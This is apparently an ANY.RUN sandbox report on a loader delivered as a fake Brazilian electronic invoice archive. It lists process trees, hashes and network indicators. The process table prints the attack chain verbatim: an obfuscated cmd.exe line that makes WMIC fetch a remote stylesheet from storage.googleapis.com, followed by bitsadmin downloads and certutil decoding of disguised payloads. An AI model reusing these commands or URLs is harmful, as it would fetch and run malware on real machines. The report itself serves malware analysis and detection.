File name: | Nota_Fiscal_Eletronica.pdf.zip |
Full analysis: | https://app.any.run/tasks/ce4a87a2-804d-4f1d-ba52-e77edc0688df |
Verdict: | Malicious activity |
Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
Analysis date: | May 15, 2019, 00:57:10 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Tags: | |
Indicators: | |
MIME: | application/octet-stream |
File info: | data |
MD5: | 6E7447E28D1F60601379866A730D11AF |
SHA1: | A77A15581B6E0B3766F1B7026938492559328C87 |
SHA256: | 8EEE6C258FC47B5C049E6D891FABBD70E1D940A89F3DE2EF0D2D4463E486D9F3 |
SSDEEP: | 24:mBDHXCWeTWA8FOwho8OeXQnsyuZ3DbmGtR5FOvj1oZ80XlCnXCwAX:6DHKyFOH8dXDjDbmGUm3knnA |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2940 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\Nota_Fiscal_Eletronica.pdf.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
2392 | "C:\Windows\System32\cmd.exe" /V /C "set x=C57hil39:57hil39\57hil39\57hil39W57hil39i57hil39nd57hil39ow57hil39s\57hil39\s57hil39ys57hil39t57hil39e57hil39m57hil39357hil39257hil39\57hil39\57hil39w57hil39b57hil39e57hil39m\57hil39\W57hil39M57hil39I57hil39C.e57hil39x57hil39e o57hil39s g57hil39e57hil39t 98d57hil39WFH57hil39J57hil39n57hil39c57hil39, ek857hil39ddU57hil39I, fre57hil39e57hil39p57hil39h57hil39y57hil39s57hil39ic57hil39al57hil39me57hil39mo57hil39ry /57hil39fo57hil39rm57hil39at:"h57hil39t57hil39t57hil39p57hil39s57hil39:57hil39/57hil39/sto57hil39rag57hil39e.g57hil39o57hil39o57hil39g57hil39l57hil39ea57hil39pi57hil39s.57hil39co57hil39m/u57hil39ltr57hil39ama57hil39k57hil39e57hil39r57hil39/57hil39057hil39857hil39/57hil39v.57hil39tx57hil39t#57hil390257hil3950157hil398ef57hil397hi57hil39l57hil39657hil39957hil39I57hil39" &&echo %x:57hil39=%|C:\Windows\system32\cmd.exe" | C:\Windows\System32\cmd.exe | — | WinRAR.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
552 | C:\Windows\system32\cmd.exe /S /D /c" echo %x:57hil39=%" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1776 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
280 | C:\\Windows\\system32\\wbem\\WMIC.exe os get 98dWFHJnc, ek8ddUI, freephysicalmemory /format:"https://storage.googleapis.com/ultramaker/08/v.txt#025018ef7hil69I" | C:\Windows\system32\wbem\WMIC.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 2147749911 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2620 | "C:\Windows\System32\wbem\WMIC.exe" os get NBRPPGJK, UBYEKYBD, FXBRFUPT, registeredusers /format:"https://storage.googleapis.com/ultramaker/08/vv.txt#6438734" | C:\Windows\System32\wbem\WMIC.exe | WMIC.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3044 | "C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground https://storage.googleapis.com/ultramaker/x/08/falxconxrenwa.jpg.zip.log?706806690 C:\Users\Public\Libraries\temporary\falxconxrenwa.jpg.z | C:\Windows\System32\bitsadmin.exe | — | WMIC.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: BITS administration utility Exit code: 0 Version: 7.5.7600.16385 (win7_rtm.090713-1255) | ||||
1232 | "C:\Windows\System32\certutil.exe" -decode C:\Users\Public\Libraries\temporary\falxconxrenwa.jpg.z C:\Users\Public\Libraries\temporary\falxconxrenwa.jpg | C:\Windows\System32\certutil.exe | — | WMIC.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 0 Version: 6.1.7601.18151 (win7sp1_gdr.130512-1533) | ||||
2928 | "C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground https://storage.googleapis.com/ultramaker/x/08/falxconxrenwb.jpg.zip.log?85154946 C:\Users\Public\Libraries\temporary\falxconxrenwb.jpg.z | C:\Windows\System32\bitsadmin.exe | — | WMIC.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: BITS administration utility Exit code: 0 Version: 7.5.7600.16385 (win7_rtm.090713-1255) | ||||
2444 | "C:\Windows\System32\certutil.exe" -decode C:\Users\Public\Libraries\temporary\falxconxrenwb.jpg.z C:\Users\Public\Libraries\temporary\falxconxrenwb.jpg | C:\Windows\System32\certutil.exe | — | WMIC.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 0 Version: 6.1.7601.18151 (win7sp1_gdr.130512-1533) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2232 | certutil.exe | C:\Users\Public\Libraries\temporary\falxconxrenwxa.~ | executable | |
MD5:1DFDF61AF56075E1EA34BB8C3DD5246D | SHA256:26C43FE98C46355DA31A80B7A24AD0BDC6C45B35B7AF5202D285FA4509896CDD | |||
2620 | WMIC.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D2U1WPAC\vv[1].txt | xml | |
MD5:70B9EBC41615C5B1CE8441CAA7AF6EE1 | SHA256:95E8C0FA936B1217B84E122EC0FDA13657C0B2C01297A55F839B566A4EEB4AD5 | |||
1064 | cmd.exe | C:\Users\Public\Libraries\temporary\r1.log | text | |
MD5:6FCC95D06CBF92797C500F16EC12B8F6 | SHA256:ACAE594A6FEF0C777E710D212EFFAC0E65CE9128C5543B5233C314840E5823EC | |||
2532 | certutil.exe | C:\Users\Public\Libraries\temporary\falxconxrenwg.gif | binary | |
MD5:577709C9B0732AB6E0C61CB250FE1850 | SHA256:1F838D23E4662BC17C460E24BAD959D79F98674CD9C12FF47C031B59CB69F507 | |||
2116 | certutil.exe | C:\Users\Public\Libraries\temporary\falxconxrenwgx.gif | binary | |
MD5:91012285CE7D691E4863EF0C1A01D6AE | SHA256:D42A7A954E8BCE86B46D594CEEC8770AC3BC477D9608EBC8C44AF3BF7B50FC0D | |||
2444 | certutil.exe | C:\Users\Public\Libraries\temporary\falxconxrenwb.jpg | binary | |
MD5:F2CF0BC2A11C62AFA0FD80A3E8CD704D | SHA256:C7F2327AF387BE23D5A6FC7FA9DDC0CA6E7BE180F0588440BE9C3EFCA04A1AAC | |||
2940 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIa2940.35748\Nota_Fiscal_Eletronica.pdf.lnk | lnk | |
MD5:1E84C1796C5D8AE62A2529201E1870C8 | SHA256:862FCF17EC26D98D3B7E3BB4D7AE69FE9FDC6F0BADB70BAD1986D61F5FED9048 | |||
280 | WMIC.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\v[1].txt | xml | |
MD5:11A91A98D3DD5F7A7CB6C14C9780194A | SHA256:777C10035E73525215F686D42ECE87D53ED86D0DB74D3AD6B500B42AFE1D666B | |||
2832 | certutil.exe | C:\Users\Public\Libraries\temporary\falxconxrenwdwwn.gif | binary | |
MD5:C823347F617BEDCCFFE1DF447BDBC240 | SHA256:C28656E6BABCA72D21DA0D7C1F017AD58E095CA23447BB951641A79239C11333 | |||
2808 | certutil.exe | C:\Users\Public\Libraries\temporary\falxconxrenwxb.~ | binary | |
MD5:B26259F3939707FF780F5F4B00AF5A39 | SHA256:3E5BA74875D9B3743AD4C1002822940FA890E12E22D68A5824C7B09DF3F40868 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
280 | WMIC.exe | 172.217.28.16:443 | storage.googleapis.com | Google Inc. | US | unknown |
— | — | 172.217.28.16:443 | storage.googleapis.com | Google Inc. | US | unknown |
2620 | WMIC.exe | 172.217.28.16:443 | storage.googleapis.com | Google Inc. | US | unknown |
Domain | IP | Reputation |
---|---|---|
storage.googleapis.com |
| whitelisted |